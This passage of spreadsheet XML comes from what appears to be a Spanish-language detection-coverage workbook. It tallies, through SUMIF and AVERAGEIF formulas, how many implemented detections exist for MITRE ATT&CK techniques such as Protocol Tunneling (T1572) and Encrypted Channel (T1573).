        <v>1 (1)</v>
      </c>
      <c r="BY64" s="12">
        <v>1</v>
      </c>
      <c r="BZ64" s="13">
        <v>1</v>
      </c>
      <c r="CA64" s="394">
        <v>1</v>
      </c>
      <c r="CB64" s="288">
        <v>2</v>
      </c>
      <c r="CC64" s="4">
        <v>2</v>
      </c>
      <c r="CD64" s="4" t="str">
        <f t="shared" si="12"/>
        <v>2 (2)</v>
      </c>
      <c r="CE64" s="4">
        <v>1</v>
      </c>
      <c r="CF64" s="4">
        <v>1</v>
      </c>
      <c r="CG64" s="13">
        <v>1</v>
      </c>
      <c r="CH64" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="65" spans="1:98" ht="15" customHeight="1">
      <c r="A65" s="4">
        <f t="shared" si="13"/>
        <v>63</v>
      </c>
      <c r="B65" s="4" t="str">
        <f>IFERROR(VLOOKUP(A65,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1572</v>
      </c>
      <c r="C65" s="4" t="str">
        <f>IFERROR(VLOOKUP(B65,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Protocol Tunneling</v>
      </c>
      <c r="D65" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B65)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E65" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F65" s="286" t="str">
        <f t="shared" si="14"/>
        <v>1 (3)</v>
      </c>
      <c r="G65" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>6</v>
      </c>
      <c r="H65" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>2</v>
      </c>
      <c r="I65" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (6)</v>
      </c>
      <c r="J65" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K65" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L65" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>2</v>
      </c>
      <c r="M65" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>1</v>
      </c>
      <c r="N65" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>1</v>
      </c>
      <c r="O65" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="P65" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>1</v>
      </c>
      <c r="Q65" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R65" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>1</v>
      </c>
      <c r="S65" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>7</v>
      </c>
      <c r="T65" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>3</v>
      </c>
      <c r="U65" s="4" t="str">
        <f t="shared" si="2"/>
        <v>3 (7)</v>
      </c>
      <c r="V65" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>2</v>
      </c>
      <c r="W65" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X65" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>2</v>
      </c>
      <c r="Y65" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>7</v>
      </c>
      <c r="Z65" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>3</v>
      </c>
      <c r="AA65" s="322" t="str">
        <f t="shared" si="3"/>
        <v>3 (7)</v>
      </c>
      <c r="AB65" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>2</v>
      </c>
      <c r="AC65" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD65" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>2</v>
      </c>
      <c r="AE65" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>6</v>
      </c>
      <c r="AF65" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>4</v>
      </c>
      <c r="AG65" s="322" t="str">
        <f t="shared" si="4"/>
        <v>4 (6)</v>
      </c>
      <c r="AH65" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>4</v>
      </c>
      <c r="AI65" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ65" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>3</v>
      </c>
      <c r="AK65" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>13</v>
      </c>
      <c r="AL65" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>7</v>
      </c>
      <c r="AM65" s="322" t="str">
        <f t="shared" si="5"/>
        <v>7 (13)</v>
      </c>
      <c r="AN65" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>6</v>
      </c>
      <c r="AO65" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP65" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>3</v>
      </c>
      <c r="AQ65" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR65" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS65" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT65" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU65" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV65" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW65" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>1</v>
      </c>
      <c r="AX65" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>1</v>
      </c>
      <c r="AY65" s="322" t="str">
        <f t="shared" si="7"/>
        <v>1 (1)</v>
      </c>
      <c r="AZ65" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>1</v>
      </c>
      <c r="BA65" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB65" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>1</v>
      </c>
      <c r="BC65" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>8</v>
      </c>
      <c r="BD65" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>4</v>
      </c>
      <c r="BE65" s="4" t="str">
        <f t="shared" si="8"/>
        <v>4 (8)</v>
      </c>
      <c r="BF65" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>3</v>
      </c>
      <c r="BG65" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH65" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>2</v>
      </c>
      <c r="BI65" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>4</v>
      </c>
      <c r="BJ65" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>3</v>
      </c>
      <c r="BK65" s="322" t="str">
        <f t="shared" si="9"/>
        <v>3 (4)</v>
      </c>
      <c r="BL65" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>3</v>
      </c>
      <c r="BM65" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN65" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>2</v>
      </c>
      <c r="BO65" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>6</v>
      </c>
      <c r="BP65" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>5</v>
      </c>
      <c r="BQ65" s="4" t="str">
        <f t="shared" si="10"/>
        <v>5 (6)</v>
      </c>
      <c r="BR65" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>3</v>
      </c>
      <c r="BS65" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>2</v>
      </c>
      <c r="BT65" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU65" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>2</v>
      </c>
      <c r="BV65" s="292">
        <v>1</v>
      </c>
      <c r="BW65" s="322">
        <v>1</v>
      </c>
      <c r="BX65" s="4" t="str">
        <f t="shared" si="11"/>
        <v>1 (1)</v>
      </c>
      <c r="BY65" s="12">
        <v>1</v>
      </c>
      <c r="BZ65" s="13">
        <v>1</v>
      </c>
      <c r="CA65" s="394">
        <v>1</v>
      </c>
      <c r="CB65" s="288">
        <v>2</v>
      </c>
      <c r="CC65" s="4">
        <v>2</v>
      </c>
      <c r="CD65" s="4" t="str">
        <f t="shared" si="12"/>
        <v>2 (2)</v>
      </c>
      <c r="CE65" s="4">
        <v>1</v>
      </c>
      <c r="CF65" s="4">
        <v>1</v>
      </c>
      <c r="CG65" s="13">
        <v>1</v>
      </c>
      <c r="CH65" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="66" spans="1:98" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A66" s="4">
        <f t="shared" si="13"/>
        <v>64</v>
      </c>
      <c r="B66" s="4" t="str">
        <f>IFERROR(VLOOKUP(A66,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1573</v>
      </c>
      <c r="C66" s="4" t="str">
        <f>IFERROR(VLOOKUP(B66,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Encrypted Channel</v>
      </c>
      <c r="D66" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B66)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E66" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F66" s="286" t="str">
        <f t="shared" si="14"/>
        <v>1 (2)</v>
      </c>
      <c r="G66" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>3</v>
      </c>
      <c r="H66" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>3</v>
      </c>
      <c r="I66" s="322" t="str">
        <f t="shared" si="0"/>
        <v>3 (3)</v>
      </c>
      <c r="J66" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>3</v>
      </c>
      <c r="K66" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L66" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M66" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N66" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O66" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P66" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q66" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R66" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S66" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>3</v>
      </c>
      <c r="T66" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>3</v>
      </c>
      <c r="U66" s="4" t="str">
        <f t="shared" si="2"/>
        <v>3 (3)</v>
      </c>
      <c r="V66" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>3</v>
      </c>
      <c r="W66" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X66" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>1</v>
      </c>
      <c r="Y66" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>3</v>
      </c>
      <c r="Z66" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>3</v>
      </c>
      <c r="AA66" s="322" t="str">
        <f t="shared" si="3"/>
        <v>3 (3)</v>
      </c>
      <c r="AB66" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>3</v>
      </c>
      <c r="AC66" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD66" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>1</v>
      </c>
      <c r="AE66" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>5</v>
      </c>
      <c r="AF66" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>3</v>
      </c>
      <c r="AG66" s="322" t="str">
        <f t="shared" si="4"/>
        <v>3 (5)</v>
      </c>
      <c r="AH66" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>3</v>
      </c>
      <c r="AI66" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ66" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>2</v>
      </c>
      <c r="AK66" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>8</v>
      </c>
      <c r="AL66" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>6</v>
      </c>
      <c r="AM66" s="322" t="str">
        <f t="shared" si="5"/>
        <v>6 (8)</v>
      </c>
      <c r="AN66" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>6</v>
      </c>
      <c r="AO66" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP66" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>2</v>
      </c>
      <c r="AQ66" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR66" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS66" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT66" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU66" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV66" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW66" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX66" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY66" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ66" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA66" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB66" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC66" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>3</v>
      </c>
      <c r="BD66" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>3</v>
      </c>
      <c r="BE66" s="4" t="str">
        <f t="shared" si="8"/>
        <v>3 (3)</v>
      </c>
      <c r="BF66" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>3</v>
      </c>
      <c r="BG66" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH66" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>1</v>
      </c>
      <c r="BI66" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ66" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK66" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL66" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM66" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN66" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO66" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>2</v>
      </c>
      <c r="BP66" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>2</v>
      </c>
      <c r="BQ66" s="4" t="str">
        <f t="shared" si="10"/>
        <v>2 (2)</v>
      </c>
      <c r="BR66" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS66" s="4">
